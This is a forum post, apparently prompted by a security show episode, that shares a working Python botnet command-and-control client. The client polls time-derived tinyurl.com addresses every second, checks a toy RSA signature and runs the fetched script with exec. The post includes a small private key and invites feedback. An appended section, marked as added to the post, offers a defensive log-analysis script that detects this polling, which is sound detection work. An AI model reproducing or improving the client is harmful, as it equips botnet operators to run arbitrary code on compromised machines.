Botnet Command; Ep701


N3Ar

Hey guys, I just watched the show, episode 701, and Mr. Darren made a comment about everyone being able to send commands to the botnet. He also asked what kind of language could be used (and he mentioned Python).

Well, I think that hashing the script + signing the script using an RSA key would do the trick.. I'm using the tinyurl idea. Anyway, I wrote a little piece of code so everyone could get the idea..

import urllib2
import time
#I'm using the built-in commands to make everything simple to understand.

#I used a very small RSA key on purpose. Here is the private part:
#10106931240432435457512676415497207375808245543230315075050583613761825020647743669133551435099535035835371621642498954346254965071187678761958624260885369
exp=3
rsakey=6737954160288290305008450943664804917205497028820210050033722409174550013765028190750077178639225298200338253620605710873086951029671673202170854382190531

def check_web ():
    nowis=time.asctime()
    i=abs(hash(nowis))   #you MUST change this hashing function!
    print "opening http://tinyurl.com/%s"%i
    web=urllib2.urlopen("http://tinyurl.com/%s"%i)
    text=web.read()
    web.close()
    if "Please check that the URL entered is correct. To learn more about TinyURL.com, please visit the" in text:
        print "the url did not exist!"
    else :
        print "url found!"
        if "###END###" in text:
            try:
                script,key=text.split("###END###")
                key=int(key)
            except:
                print 'more than one "###END###" in text'
            else:  #will be executed if exception doesn't occur
                if pow(key,exp,rsakey)==abs(hash(script+nowis)):
                    # This is the reason why i wrote it in python:                    
                    exec script
        else :
            print 'no "###END###" in text'

while 1:
    time.sleep(1)
    check_web()

And it does work pretty well... Note that if I use script+nowis for the hash, it is because I want a command to be executed only once.

And it makes me think, there was a big trojan recently that used the same idea, but with domain names ^^

Anyway, I'd like some feedback, your ideas..

Edited by N3Ar
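
From the defender's side, the polling loop in the post leaves a recognisable trace: one client requesting a different all-digit tinyurl.com alias every second. The sketch below is an added example, not part of the original post, that flags that pattern in proxy logs; the log format, sample lines, window and threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches only all-digit TinyURL paths, like the time-derived ones in the post.
NUMERIC_ALIAS = re.compile(r"^https?://tinyurl\.com/(\d+)$")

def make_sample_log():
    """Constructed proxy log: 'ISO-time client-ip URL' (assumed format)."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    for s in range(40):  # one client polling a new numeric alias every second
        ts = (base + timedelta(seconds=s)).isoformat()
        lines.append("%s 10.0.0.5 http://tinyurl.com/%d" % (ts, 7 * 10**18 + s * 7919))
    # an ordinary user following a few shortened links
    lines.append("2024-01-01T12:00:03 10.0.0.9 http://tinyurl.com/y3kq8abc")
    lines.append("2024-01-01T12:00:20 10.0.0.9 http://tinyurl.com/123456")
    lines.append("2024-01-01T12:05:00 10.0.0.9 https://tinyurl.com/docs-2024")
    return lines

def find_pollers(lines, window=timedelta(seconds=60), min_distinct=20):
    """Return {client: peak count of distinct numeric aliases within `window`}."""
    events = defaultdict(list)
    for line in lines:
        ts, client, url = line.split()
        m = NUMERIC_ALIAS.match(url)
        if m:
            events[client].append((datetime.fromisoformat(ts), m.group(1)))
    flagged = {}
    for client, seen in events.items():
        seen.sort()
        start = peak = 0
        for end in range(len(seen)):
            # slide the window start forward until it spans at most `window`
            while seen[end][0] - seen[start][0] > window:
                start += 1
            peak = max(peak, len({alias for _, alias in seen[start:end + 1]}))
        if peak >= min_distinct:
            flagged[client] = peak
    return flagged

if __name__ == "__main__":
    for client, peak in find_pollers(make_sample_log()).items():
        print("%s requested %d distinct numeric aliases within a minute" % (client, peak))
```

Counting distinct aliases rather than raw requests keeps a user who reloads one shortened link from being flagged.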